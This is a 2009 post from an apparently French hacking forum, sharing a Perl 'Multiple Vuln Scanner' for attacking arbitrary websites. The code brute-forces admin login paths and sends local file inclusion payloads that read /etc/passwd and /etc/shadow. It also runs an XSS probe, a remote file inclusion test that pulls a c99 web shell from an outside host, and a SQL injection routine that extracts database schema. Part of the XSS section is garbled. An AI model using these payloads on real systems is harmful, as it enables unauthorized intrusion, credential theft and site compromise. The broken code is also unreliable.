Dark Angel Index du Forum
Dark Angel
Hacking and Reverse
 
Dark Angel Index du ForumFAQRechercherS’enregistrerConnexion

:: Multiple Vulnerabilities Scanner ::

 
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> Scanners
Sujet précédent :: Sujet suivant  
Auteur Message
Fwank
Membre
Membre

Hors ligne

Inscrit le: 25 Nov 2009
Messages: 100

MessagePosté le: Mar 1 Déc - 12:28 (2009)    Sujet du message: Multiple Vulnerabilities Scanner Répondre en citant

#!usr/bin/perl
##################################################################
# Coded by revan12 modified by 777
###################################################################

system("CLS");
system("Multiple Vuln Scanner");

use Digest::MD5;
use MIME::Base64;
use HTTP::Request;
use LWP::UserAgent;
use LWP::Simple;
print "\t-----------------------------\n";
print "\t-- Multiple Vuln Scanner\n";
print "\t-- Coded By revan12 \n";
print "\t-- Modified by 777 \n";
print "\t----------------------------\n\n";

print "\n\n 1) Vulnerability Scanner \n";
print "\n 2) Other \n\n";
print "--> ";
$VS=<STDIN>;
chomp $VS;
############################ Service ##################################
if($VS eq 2){

print " 1) MD5 Generator \n";
print " 2) Encode Base64\n";
print " 3) Decode Base64\n";
print " 4) Control Panel Finder \n";

#--> Path Arrays for CPR
@CPR=(
'/admin/','/administrator/','/moderator/','/webadmin/','/adminarea/','/bb-admin/','/adminLogin/','/admin_area/','/panel-administracion/','/instadmin/',
'/memberadmin/','/administratorlogin/','/adm/','/admin/account.php','/admin/index.php','/admin/login.php','/admin/admin.php','/admin/account.php',
'/admin_area/admin.php','/admin_area/login.php','/siteadmin/login.php','/siteadmin/index.php','/siteadmin/login.html','/admin/account.html','/admin/index.html',
'admin login.html','admin/admin.html',
'/admin_area/index.php','/bb-admin/index.php','/bb-admin/login.php','/bb-admin/admin.php','/admin/home.php','/admin_area/login.html','/admin_area/index.html',
'/admin/controlpanel.php','/admin.php','/admincp/index.asp','/admincp/login.asp','/admincp/index.html','/admin/account.html','/adminpanel.html','/webadmin.html',
'/webadmin/index.html','/webadmin/admin.html','/webadmin/login.html','/admin/admin_login.html','/admin_login.html','/panel-administracion/login.html',
'/admin/cp.php','/cp.php','/administrator/index.php','/administrator/login.php','/nsw/admin/login.php','/webadmin/login.php','/admin/admin_login.php','/admin_login.php',
'/administrator/account.php','/administrator.php','/admin_area/admin.html','/pages/admin/admin-login.php','/admin/admin-login.php','/admin-login.php',
'/bb-admin/index.html','/bb-admin/login.html','/bb-admin/admin.html','/admin/home.html','/login.php','/modelsearch/login.php','/moderator.php','/moderator/login.php',
'/moderator/admin.php','/account.php','/pages/admin/admin-login.html','/admin/admin-login.html','/admin-login.html','/controlpanel.php','/admincontrol.php',
'/admin/adminLogin.html','adminLogin.html','/admin/adminLogin.html','/home.html','/rcjakar/admin/login.php','/adminarea/index.html','/adminarea/admin.html',
'/webadmin.php','/webadmin/index.php','/webadmin/admin.php','/admin/controlpanel.html','/admin.html','/admin/cp.html','/cp.html','/adminpanel.php','/moderator.html',
'/administrator/index.html','/administrator/login.html','/user.html','/administrator/account.html','/administrator.html','/login.html','/modelsearch/login.html',
'/moderator/login.html','/adminarea/login.html','/panel-administracion/index.html','/panel-administracion/admin.html','/modelsearch/index.html','/modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','/adm.html','/moderator/admin.html','/user.php','/account.html','/controlpanel.html','/admincontrol.html',
'/panel-administracion/login.php','/wp-login.php','/adminLogin.php','/admin/adminLogin.php','/home.php','/secureadmin.php','/adminarea/index.php',
'/adminarea/admin.php','/adminarea/login.php','/panel-administracion/index.php','/panel-administracion/admin.php','/modelsearch/index.php',
'/modelsearch/admin.php','/admincontrol/login.php','/adm/admloginuser.php','/admloginuser.php','/admin2.php','/admin2/login.php','/admin2/index.php',
'/adm/index.php','/adm.php','/affiliate.php','/adm_auth.php','/memberadmin.php','/administratorlogin.php','/secureadmin.php','/secureadmin/','/verysecure.php','securelogon.php',
'/admin2009.php','/webadministration/','webadministrasi.php','/admininput.php','/secure.php','/secureadministration.php','/phpmyadmin/','/sosecure.php','/hardfound.php',
'/dificultadmin.php/','/administracion/','/root.php','/locked.php','/locked/','/adminnn.php','/adminsitus.php','/adminsitus/','/adminsite/','/adminsite.php','/administratorsite/',
'/adminpageonly/','/adminonly.php','/admin-site.php','/admin-site/','/administratorsite.php','/usersite.php','/maintenance.php','/reconstruct.php','/pageadmin.php','/usersdatabase.php',
'/databaseuser.php','/databaseusers/','/webdatalogin.php','/dataadministration.php','/homeadmin/','/fjk.php','/database.php','/database/','/dataweb/','/qwerty.php','/account.php',
'/account.php','/testaccount.php','/accountlogon.php','/account2009/','/accountlogin.php','/webaccount.php','/databaseuserlogin.php','/databaseadministration/','/database.php',
'/loggon.php','/myadmin.php','/webadmin.php','/checkadmin.php','/homeweb.php','/webhome.php','/adminarea.php','/logonpanel.php','/loginwebadmin.php'
);

$serv=<STDIN>;
chomp $serv;

if($serv eq 1)
{
print " Enter Your String \n";
$md=<STDIN>;
chomp $md;
print Digest::MD5->md5_hex("$md")
}
if($serv eq 2){
print " Enter String To Encode \n";
$basd=<STDIN>;
chomp $basd;
$sss=encode_base64($basd);
print "Your base64 Code Created : \n\n $sss \n";
}
if($serv eq 3){
print " Enter String To Decode \n";
$base=<STDIN>;
chomp $base;
$rrr=decode_base64($base);
print " Decoded success : \n\n $rrr \n";
}

if($serv eq 4){
print " Enter Site ex : http://www.site.com\n";
$CP=<STDIN>;
chomp $CP;

print "\n";

foreach $CPP(@CPR){
$EEE=$CP.$CPP;

$V=HTTP::Request->new(GET=>$EEE);
$B=LWP::UserAgent->new();
$B->timeout(30);
$HEE=$B->request($V);

if($HEE->content =~ /Username/ ||
$HEE->content =~ /Password/ ){
print " \n Founded ==> $EEE\n\n";
}
else{print "Not Found ==> $EEE\n";}
}
}
}
############################# Vulnerability Scanner ############################
if($VS eq 1){

print " 1) LFI Scan # Local File Include \n";
print " 2) XSS Scan # Cross Site Scripting\n";
print " 3) RFI Scan # Remote File Include \n";
print " 4) SQL Scan # SQL Injection (MYSLQ) Scan\n";
print " 5) ALL Scan # LFI , XSS , RFI Scan ((( SQL Soon )))\n";

print "\n\n -->";
$answer=<STDIN>;
chomp $answer;

if($answer eq 1){
sub LFI{
print " Enter Site : e.x : http://www.site.com/index.php?q=\n\n";
$site=<STDIN>;
chomp $site;




#############################################LFI Scanner#########################################
if($site !~/http:\/\//){
$site ="http://$site";}
@devil=('../../etc/passwd%00',
'../../../etc/passwd%00',
'../../../../etc/passwd%00',
'../../../../../etc/passwd%00',
'../../../../../../etc/passwd%00',
'../../../../../../../etc/passwd%00',
'../../../../../../../../etc/passwd%00',
'../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../etc/passwd%00',
'../../../../../../../../../../../../../../../..etc/passwd%00',
'../../etc/passwd',
'../../../etc/passwd',
'../../../../etc/passwd',
'../../../../../etc/passwd',
'../../../../../../etc/passwd',
'../../../../../../../etc/passwd',
'../../../../../../../../etc/passwd',
'../../../../../../../../../etc/passwd',
'../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../etc/passwd',
'../../../../../../../../../../../../../../../..etc/passwd',
'../etc/shadow',
'../../etc/shadow',
'../../../etc/shadow',
'../../../../etc/shadow',
'../../../../../etc/shadow',
'../../../../../../etc/shadow',
'../../../../../../../etc/shadow',
'../../../../../../../../etc/shadow',
'../../../../../../../../../etc/shadow',
'../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../etc/shadow',
'../../../../../../../../../../../../../../etc/shadow',
'../etc/group',
'../../etc/group',
'../../../etc/group',
'../../../../etc/group',
'../../../../../etc/group',
'../../../../../../etc/group',
'../../../../../../../etc/group',
'../../../../../../../../etc/group',
'../../../../../../../../../etc/group',
'../../../../../../../../../../etc/group',
'../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../etc/group',
'../../../../../../../../../../../../../../etc/group',
'../etc/security/group',
'../../etc/security/group',
'../../../etc/security/group',
'../../../../etc/security/group',
'../../../../../etc/security/group',
'../../../../../../etc/security/group',
'../../../../../../../etc/security/group',
'../../../../../../../../etc/security/group',
'../../../../../../../../../etc/security/group',
'../../../../../../../../../../etc/security/group',
'../../../../../../../../../../../etc/security/group',
'../etc/security/passwd',
'../../etc/security/passwd',
'../../../etc/security/passwd',
'../../../../etc/security/passwd',
'../../../../../etc/security/passwd',
'../../../../../../etc/security/passwd',
'../../../../../../../etc/security/passwd',
'../../../../../../../../etc/security/passwd',
'../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../etc/security/passwd',
'../../../../../../../../../../../../../../etc/security/passwd',
'../etc/security/user',
'../../etc/security/user',
'../../../etc/security/user',
'../../../../etc/security/user',
'../../../../../etc/security/user',
'../../../../../../etc/security/user',
'../../../../../../../etc/security/user',
'../../../../../../../../etc/security/user',
'../../../../../../../../../etc/security/user',
'../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../etc/security/user',
'../../../../../../../../../../../../../etc/security/user'
);
foreach $scanning(@devil)
{
$run=$site.$scanning;
$request =HTTP::Request->new(GET=>$run);
$agent= LWP::UserAgent->new();
$response=$agent->request($request);
if($response->is_success && $response->content =~/root:x:/){
open(MYFILE,'>>lfi.txt');
print MYFILE $run;
$ss="Vuln founded & Created in c:/lfi.txt";
}
else {
$ss="not found";}
print " $scanning =>[$ss]\n";
}
}
&LFI;
}

##################################################XSS Scanner#################################################

elsif($answer eq 2){
sub XSS{
print " Enter Site to Cross it Very Happy : like \n http://www.site.com/iq.php?id=\n\n";
$xssans=<STDIN>;
chomp $xssans;
$xsscode='>"<script>alert("revan12")</script>
new();
$req=$agent->get("$xss");
if($req->is_success && $req->content=~/revan12/){
print "Vuln Founded ===============>>>>> & Created in C:/xss.txt ";
open(XSS,'>>xss.txt');
print XSS $xss;
close (XSS);
}
else {
print "Vuln Not Founded\n\n";
}
}
&XSS;
}

#####################################################RFI Scanner################################################

elsif($answer eq 3){
sub RFI{
print " Enter Site ex : http://www.site.com/qqq.php?w= \n";
$rfi=<STDIN>;
chomp $rfi;

$rficode="http://revan12.kilu.de/c99.txt";
$rfid=$rfi.$rficode;
$request =HTTP::Request->new(GET=>$rfid);
$agent= LWP::UserAgent->new();
$response=$agent->request($request);
if($response->is_success && $response->content =~/c99/){
open(MYFILE,'>>rfi.txt');
print MYFILE $rfid;
$ss="Vuln founded & Created in c:/rfi.txt";
}
else {
$ss="Cant Bind";}
print " $rfid =>[$ss]\n";
}
&RFI;
}
####################################################SQL Scanner#################################################
####################### Information_schema Extractor -- Version 5 -- ###########################################
elsif($answer eq 4)
{
print " 1) Shema Extractor -- Version 5 -- \n";
print " 2) SQL Injector \n";
$choice=<STDIN>;
chomp $choice;
if($choice eq 1){
print " Enter site ex : http://www.site.com/index.php?id=-1 union select 1,2,3,revan12,5,6,7 \n \n --> ";
$sqlsite=<STDIN>;
chomp $sqlsite;
$concat="concat(0x3A3A46697273743A3A00,table_name,0x3A3A5365636F6E643A3A00,column_name,0x3A3A)";
if($sqlsite=~/revan12/){
for($y=177;$y<=3000;$y++)
{
$sqlsite=~s/revan12/$concat/;
$sql="$sqlsite+from+information_schema.columns+LIMIT+$y,1--";
$request1 =HTTP::Request->new(GET=>$sql);
$agent1 = LWP::UserAgent->new();
$response1=$agent1->request($request1)->as_string;
if($response1 =~ m/.*?::First:Sad.*?)::Second:Sad.*?)::/){
print " Table : $1 ||||| Column : $2 \n";
open(ex,'>>extract.txt');
print ex "Table : $1 Column : $2 \n";
close(ex);
}
}
}
}
####################### SQL Injector ################################################################
if($choice eq 2){
print " Soon ....... ";
}

}
}

####################################################Scan All#######################################################
elsif($answer eq 5){
&LFI;
&XSS;
&RFI;
}


Revenir en haut
Publicité






MessagePosté le: Mar 1 Déc - 12:28 (2009)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    Dark Angel Index du Forum -> Hacking -> Scanners Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Index | Panneau d’administration | créer forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
HalloweenOclock © theme by larme d'ange 2006
Powered by phpBB © 2001, 2005 phpBB Group
Traduction par : phpBB-fr.com